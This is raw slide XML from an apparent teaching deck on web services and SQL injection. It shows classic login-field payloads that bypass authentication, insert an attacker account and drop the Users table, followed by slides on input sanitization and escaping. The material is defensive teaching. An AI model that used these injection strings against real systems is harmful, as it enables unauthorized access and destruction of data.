            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="39370" h="28575">
                <a:moveTo>
                  <a:pt x="24957" y="14274"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="39247" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39232" y="28564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24957" y="14274"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25582293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969A47D-DE4C-B94A-9271-A3CE904471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2185986"/>
            <a:ext cx="8305800" cy="4672013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0630DB6-CDC6-F249-8A83-AC7098E0A671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Web Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B870D308-F9F7-9142-AA9F-86B0B6634DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5868988"/>
            <a:ext cx="9144000" cy="1046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17" tIns="60958" rIns="121917" bIns="60958">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r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://musicmachinery.com/category/web-services/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C89B8E1-610D-A347-8B4A-3DCFB683381A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2185986"/>
            <a:ext cx="152400" cy="467201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2" name="Rounded Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C9E8D5F-4B15-1F4D-B8CF-72955D0017DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="914400" y="2128562"/>
            <a:ext cx="8229600" cy="20982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3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A543AB0-49DA-F749-AA68-955AACDEA25F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>many web services of many types</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388433341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3F3819-604A-1644-B37A-183C4C12CFE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF73711-E9B9-E944-9DAC-B1E1267B8437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Exploit malicious login inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user = “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then script does:                              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ok = execute( SELECT * FROM Users  WHERE user= ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” causes the rest of line to be ignored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OK is always true and login succeeds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229669864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3F3819-604A-1644-B37A-183C4C12CFE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF73711-E9B9-E944-9DAC-B1E1267B8437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Exploit malicious login inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user = “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' ; INSERT INTO TABLE Users (‘attacker’,  ‘attacker secret’); -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then script does:                              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ok = execute( SELECT * FROM Users  WHERE user= ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' ; INSERT INTO TABLE Users (‘attacker’,  ‘attacker secret’); --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create another account with password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18478613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3F3819-604A-1644-B37A-183C4C12CFE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF73711-E9B9-E944-9DAC-B1E1267B8437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Exploit malicious login inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user = “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' ; DROP TABLE Users -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then script does:                              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ok = execute( SELECT * FROM Users  WHERE user= ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ DROP TABLE Users --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” causes the rest of line to be ignored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete all data?!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234782452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70F181-F0B4-E24C-AC29-500F464F6E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Input Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C543B2F3-874C-304A-8A58-CE3BDBE64633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Sanitize user input:                          check or enforce that value/string does not have commands of any sort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Disallow special characters, or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Escape input string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78874509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D26E99-5138-6D40-9C1C-A7597B0FB684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Input Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5DC98B-88A8-0847-A41F-C87D6A014749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Escape input string:                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the input string should be interpreted as a string and not as a special char;       to escape the SQL parser, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backslash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in front of special characters, such as quotes or backslashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>asdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123915443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EE8DC5-A1F8-A141-A864-BC991423AE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Input Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F84C8EC-36E5-7442-894A-7F682B156732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Different SQL parsers have different escape sequences or API for escaping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>, parser considers a string is starting or ending</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, parser considers it as a character part of a string and converts it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32155550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EE8DC5-A1F8-A141-A864-BC991423AE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Input Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F84C8EC-36E5-7442-894A-7F682B156732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Escaping examples:                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[…] WHERE Username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                 […] WHERE Username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
